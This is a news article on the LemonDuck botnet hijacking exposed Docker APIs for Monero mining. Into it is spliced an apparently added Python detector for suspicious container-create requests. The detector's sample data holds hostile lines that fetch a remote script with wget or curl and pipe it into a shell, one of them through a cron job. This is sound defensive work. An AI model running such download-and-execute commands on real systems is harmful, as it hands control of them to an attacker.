news4global
LemonDuck botnet plunders Docker cloud instances in cryptocurrency crime wave

April 22, 2022
Operators of the LemonDuck botnet are targeting Docker instances in a cryptocurrency mining campaign.

LemonDuck is cryptocurrency mining malware wrapped up in a botnet structure. The malware exploits older vulnerabilities to infiltrate cloud systems and servers, including the Microsoft Exchange ProxyLogon bugs, EternalBlue, and BlueKeep.

As noted by Microsoft’s security team in 2021, the threat actors behind the malware are known to be selective when it comes to timing and may trigger an attack when teams are focused on “patching a popular vulnerability rather than investigating compromise.”

LemonDuck has expanded its operations from Windows machines to also include Linux and Docker. In an ongoing, active campaign, CrowdStrike says that Docker APIs are being targeted to obtain initial access to cloud instances.

Docker is used for running containers in the cloud. On Thursday, the cybersecurity researchers said that LemonDuck will take advantage of misconfigurations in instances that cause API exposure to deploy exploit kits and load malware.

In a case observed by the team, an exposed API was abused to run a custom Docker ENTRYPOINT instruction and download “core.png,” a Bash script disguised as an image file.

The file was downloaded from a domain in LemonDuck’s “vast” command-and-control (C2) infrastructure.

“CrowdStrike found multiple campaigns being operated via the domain targeting Windows and Linux platforms simultaneously,” the researchers noted.

Core.png will launch a Linux cronjob inside the vulnerable container and then download a secondary Bash file, “a.asp,” the main LemonDuck payload.

The cronjob will trigger LemonDuck. The malware will first kill several processes, including network connections, rival cryptocurrency mining operations, and existing ties to mining pools. LemonDuck will also target known daemons tasked with monitoring, such as Alibaba Cloud’s monitoring service.

Now that the server has been prepared, a cryptocurrency mining operation begins. XMRig, used to generate Monero (XMR), is launched with a configuration set to proxy pools, an attempt to hide the true cryptocurrency wallet address of the attacker.

LemonDuck doesn’t stop at just one Docker instance, however. The malware will also search for SSH keys in the file system to log into other servers and repeat its malicious operations.
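Detection logic for the chain described above, added here as an example and not code from CrowdStrike or the original article: it audits container-create request bodies for an ENTRYPOINT or CMD that pipes a download into a shell, fetches a file whose extension is not a script's, or installs a cron job. The request bodies, the rule patterns and the placeholder domains under example.invalid are constructed assumptions; only the file names core.png and a.asp come from the article.

```python
import re

# Constructed container-create request bodies (Entrypoint/Cmd as the Docker
# Engine API carries them). The example.invalid domains are placeholders.
SAMPLE_REQUESTS = [
    {"Image": "nginx:1.21", "Entrypoint": ["/docker-entrypoint.sh"],
     "Cmd": ["nginx", "-g", "daemon off;"]},
    {"Image": "alpine", "Entrypoint": ["/bin/sh", "-c",
     "wget -q -O - http://c2.example.invalid/core.png | bash"]},
    {"Image": "alpine", "Cmd": ["sh", "-c",
     "echo '*/5 * * * * curl -s http://c2.example.invalid/a.asp | sh' | crontab -"]},
    {"Image": "alpine", "Entrypoint": "curl -fsSL https://get.example.invalid/setup.sh | sh"},
]

FETCH = re.compile(r"\b(?:curl|wget)\b[^|;&]*?(https?://\S+)", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:ba|da|z)?sh\b")
DISGUISED_EXT = re.compile(r"\.(?:png|jpe?g|gif|bmp|asp|aspx)$", re.I)
CRON = re.compile(r"\bcrontab\b|/etc/cron|/var/spool/cron")


def _argv(value):
    """Entrypoint and Cmd may each be a string, a list, or absent."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def audit_create_request(body):
    """Return the findings for one container-create request body."""
    line = " ".join(_argv(body.get("Entrypoint")) + _argv(body.get("Cmd")))
    findings = []
    fetch = FETCH.search(line)
    if fetch:
        url = fetch.group(1).rstrip("'\"").split("?")[0]
        if PIPE_TO_SHELL.search(line):
            findings.append("download piped to a shell")
        if DISGUISED_EXT.search(url):
            findings.append("fetched file has a non-script extension")
    if CRON.search(line):
        findings.append("installs a cron job at container start")
    return findings


def triage(requests):
    """Map request index -> findings, keeping only flagged requests."""
    results = {i: audit_create_request(r) for i, r in enumerate(requests)}
    return {i: f for i, f in results.items() if f}


if __name__ == "__main__":
    for index, findings in triage(SAMPLE_REQUESTS).items():
        print(index, SAMPLE_REQUESTS[index]["Image"], findings)
```

The fourth sample shows why the findings are kept separate: a download piped to a shell is common in legitimate install scripts, while the combination with a mismatched file extension or a cron job at container start is the pattern the article describes.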

“Due to the cryptocurrency boom in recent years, combined with cloud and container adoption in enterprises, cryptomining is proven to be a monetarily attractive option for attackers,” the researchers say. “Since cloud and container ecosystems heavily use Linux, it drew the attention of the operators of botnets like LemonDuck, which started targeting Docker for cryptomining on the Linux platform.”

© 2022 Designed by news4global
